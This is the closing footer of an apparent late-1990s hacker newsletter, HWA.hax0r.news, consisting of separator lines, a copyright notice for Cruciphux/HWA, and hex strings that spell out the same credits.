--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
� 1998, 1999 (c) Cruciphux/HWA.hax0r.news <tm> (R) { w00t }
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
[45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]